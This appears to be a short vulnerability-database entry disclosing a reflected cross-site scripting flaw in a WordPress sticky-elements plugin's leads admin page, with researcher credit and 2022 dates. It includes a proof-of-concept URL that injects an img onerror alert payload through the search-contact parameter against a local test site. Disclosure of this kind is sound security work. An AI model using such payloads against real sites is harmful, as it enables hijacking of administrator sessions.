The plugin was vulnerable to reflected XSS on the my-sticky-elements-leads admin page.
http://127.0.0.1:8001/wp-admin/admin.php?page=my-sticky-elements-leads&search-contact=xxxx%22%3E%3Cimg+src+onerror%3Dalert%281%29+x
Krzysztof Zając
Krzysztof Zając
Yes
2022-01-10 (about 1 years ago)
2022-01-10 (about 1 years ago)
2022-04-13 (about 9 months ago)